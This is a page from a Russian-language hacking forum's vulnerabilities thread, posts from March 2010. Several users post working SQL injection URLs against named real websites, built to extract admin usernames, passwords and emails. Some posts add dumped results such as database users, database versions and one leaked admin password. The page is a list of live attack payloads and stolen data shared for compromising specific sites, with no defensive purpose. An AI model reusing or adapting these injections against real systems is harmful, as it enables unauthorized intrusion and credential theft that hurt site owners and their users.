ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11691  
Старый 28.03.2010, 02:21
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

machinz.co.uk

вся инфа в исходном коде страницы
Код:
http://www.machinz.co.uk/Productview.php?product=-2+and+1=2+union+select+1,concat(Username,0x20,Password,0x20,Email)+from+LoginUsers--
jagz.co.uk
Код:
http://www.jagz.co.uk/menu.php?CategoryID=-9+union+select+1,2,concat(AdminName,0x20,AdminPwd),4,5,6,7,8,9+from+Admin--
biblios.pijnenburg.it
Код:
http://biblios.pijnenburg.it/title.php?param=-1547+union+select+1,2,3,4,concat(username,0x20,password),6,7,8,9,10,11+from+tblUser--
www.vivliokritiki.gr
Код:
http://www.vivliokritiki.gr/title.php?id=-6+union+select+1,concat(email,0x20,password),3,4,5,6,7,8,9,10,11,12+from+users--
jetproducts.co.uk
в исходном коде
Код:
http://www.jetproducts.co.uk/details.php?prod_id=-159+union+select+1,concat(username,0x20,password,0x20,email),3,4+from+zebra_admin--
istitutocam.com
Код:
http://www.istitutocam.com/pagina-istituto-cam.php?id=-3+union+select+1,2,concat(username,0x20,password,0x20,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+clienti--
www.liveview.cz
Код:
http://www.liveview.cz/cam.php?id=-31+union+select+1,concat(login,0x20,pwd)+from+lv_users--
Код:
admin;qweasd
salesbearing.com
вывод в тайтле
Код:
http://www.salesbearing.com/products/product.php?id=-31+union+select+1,concat(username,0x20,pwd),3,4+from+admin--
moretonisland.com.au
Код:
http://www.moretonisland.com.au/product.php?id=-67753+union+select+1,2,concat(username,0x20,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+customers--
edra.com
Код:
http://www.edra.com/product.php?id=-42+union+select+1,2,3,4,5,concat(user(),0x20,database(),0x20,version()),7,8,9,10,11,12,13,14,15,16,17,18--
 
Ответить с цитированием

  #11692  
Старый 28.03.2010, 03:19
total90
Участник форума
Регистрация: 30.09.2009
Сообщений: 148
Провел на форуме:
11581319

Репутация: 241
Отправить сообщение для total90 с помощью ICQ
По умолчанию

Код:
http://www.kras-ru.1gb.ru/action.php?action=plugin&name=gallery&type=album&id=-5+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10--
User: 1gb_kras@10.0.2.3
Database: 1gb_kras
Version: 5.0.51a-community-nt-log


Код:
http://expozice.sternberk.cz/ClankyPodrobnosti.php?id=87+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9--&typ=aktualne
User: expozice_casu@localhost
Database: expozice_casu
Version: 4.0.18-max-debug


Код:
http://www.esend.su/index.php?mode=user_message_details&id=106823+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18--&page=&rows=&owner=&for_time=31&cost1=&cost2=&object=&region=&thing=&number=&phone_avail=&mebel_avail=&refrigerator_avail=&tv_avail=&street=
User: send@localhost
Database: esend
Version: 5.0.32-Debian_7etch12-log


Код:
http://www.che-esche.com/fullafisha.php?id=53+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8--
User: cheesche_cheewe2@localhost
Database: cheesche_cheesche
Version: 5.0.77-log
 
Ответить с цитированием

  #11693  
Старый 28.03.2010, 10:46
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
http://demo.xbtit.com/index.php?page=torrents&active=2&order=speed+or(1, 1)=(select+count(0),concat((select+database()+from +information_schema.tables+limit+0,1),floor(rand(0 )*2))from(information_schema.tables)group+by+2)--++&by=ASC
на этом сайте уже было, но в другом месте.
 
Ответить с цитированием

  #11694  
Старый 28.03.2010, 11:56
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.nutricia.pl/kartki_galeria.php?A=SCHOW_ID&pid=-4671+union+select+1,concat(loginname,char(58),pass word)+from+cmslist_admin--

user() : nutricia@192.168.27.17
version() : 5.0.84
database() : nutricia

nutrica.pl/cms
nutrica.pl/admin

admin : phplist (в админу не входит).... ????
 
Ответить с цитированием

  #11695  
Старый 28.03.2010, 12:46
total90
Участник форума
Регистрация: 30.09.2009
Сообщений: 148
Провел на форуме:
11581319

Репутация: 241
Отправить сообщение для total90 с помощью ICQ
По умолчанию

Код:
http://www.seacsub.com/product.php?ID=679+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,concat_ws(0x3a,user(),database(),version()),29,30,31,32,33,34,35--
User: seacsub07@localhost
Database: seacsub_com
Version: 5.0.45
PR4
 
Ответить с цитированием

  #11696  
Старый 28.03.2010, 13:57
total90
Участник форума
Регистрация: 30.09.2009
Сообщений: 148
Провел на форуме:
11581319

Репутация: 241
Отправить сообщение для total90 с помощью ICQ
По умолчанию

Код:
https://www.greatcanadianholidays.com/greatcanadianholidays/myweb.php?hls=10007&id=30696+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,unhex(hex(concat_ws(0x3a,user(),database(),version()))),47,48,49,50,51--
User: gchc_plujo@localhost
Database: MYwebPHP-great
Version: 4.1.10a


Код:
http://etweb.gazettenet.com/web/gateway.php?query=VenueEvents&site=default&tpl=cm_VenueSchedule&ID=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),database(),version()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,420,421,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440,441,442,443,444,445,446,447,448,449,450,451,452,453,454,455,456,457,458,459,460,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,476,477,478,479,480,481,482,483,484,485,486,487,488,489,490,491,492,493,494,495,496,497,498,499,500,501,502,503,504,505,506,507,508,509,510,511,512,513,514,515,516,517,518,519,520,521,522,523,524,525,526,527,528,529,530,531,532,533,534,535,536,537,538,539,540,541,542,543,544,545,546,547,548,549,550,551--
551 колонка

User: appetweb@host-25-188.coresecure.net
Database: etweb
Version: 4.1.22-log

Последний раз редактировалось total90; 28.03.2010 в 15:27..
 
Ответить с цитированием

  #11697  
Старый 28.03.2010, 14:10
Keltos
Iron Man#2
Регистрация: 08.07.2009
Сообщений: 2,084
Провел на форуме:
3896191

Репутация: 2562


По умолчанию

Код:
http://www.sanmebel.ru/seriya.php?ser=-80+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19--
User: sanmebel@bux.hc.ru
Database: wwwsanmebelru
Version: 4.0.25
 
Ответить с цитированием

  #11698  
Старый 28.03.2010, 15:55
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

interplay.com
Код:
http://www.interplay.com/games/support.php?id=-120+union+select+1,concat(version(),0x20,database(),0x20,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
retailtherapy.tv
Код:
http://www.retailtherapy.tv/video.php?id=-163+union+select+1,2,3,concat(version(),0x20,user(),0x20,database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
upbulk.com
Код:
http://www.upbulk.com/video.php?id=1517+and+1=2+union+select+1,concat(name,0x20,password,0x20),3,4,5,6,7,8,9+from+user--
filmdeculte.com
Код:
http://archive.filmdeculte.com/video/video.php?id=-73+union+select+concat(version(),0x20,database(),0x20,user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
bloggingheads.tv
вывод в самой же адресной строке О-o
Код:
http://bloggingheads.tv/video.php?id=231&cid=-1214+union+select+concat(username,0x20,password),2,3+from+user--
thaipods.com
Код:
http://www.thaipods.com/video.php?id=-93026211+union+select+1,concat(Name,0x20,Password,0x20,Email),3,4,5,6,7,8+from+Login--
 
Ответить с цитированием

  #11699  
Старый 28.03.2010, 16:27
SEWERN
Участник форума
Регистрация: 09.01.2009
Сообщений: 155
Провел на форуме:
2253612

Репутация: 94
По умолчанию

Код:
http://vertu-shop.net/news.php?id=16%20UNION%20SELECT%201,CONCAT(Version(),Database(),User()),3,4,5,6%20LIMIT%201,1--
Database Version: 5.0.89-community-log
Database name: arslan3_vertushop
User name: arslan3@localhost


Код:
http://www.snseurope.com/snslink/news/news-full.php?id=14142/**/UNION/**/SELECT/**/CONCAT(Version(),Database(),User()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/LIMIT/**/1,1--
Database Version: 5.0.89-community-log
Database name: arslan3_vertushop
User name: arslan3@localhost


Код:
http://www.gardenorganic.org.uk/research/news/story.php?id=1025%20UNION%20SELECT%20CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),2,3,4,5,6,7,8,9,10,11,12,13%20LIMIT%201,1--

Последний раз редактировалось SEWERN; 28.03.2010 в 17:02..
 
Ответить с цитированием

  #11700  
Старый 28.03.2010, 17:17
total90
Участник форума
Регистрация: 30.09.2009
Сообщений: 148
Провел на форуме:
11581319

Репутация: 241
Отправить сообщение для total90 с помощью ICQ
По умолчанию

Код:
http://www.cbdc.ca/stories.php?id=-26+union+select+1,concat_ws(0x3a,user(),database(),version())--&rid=34
//этот сайт уже был, но скуля была в другом месте

User: web6u1@localhost
Database: web6db1
Version: 5.0.77
PR5

Код:
http://www.cloudynights.com/category.php?category_id=-2+union+select+1,2,3,4,5,concat_ws(0x3a,user(),database(),version()),7,8,9,10,11,12,13,14,15,16,17,18,19--
//этот так же

User: asaint_6@216.92.192.94
Database: asaint_cloudynights
Version: 4.1.22-log
PR6
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ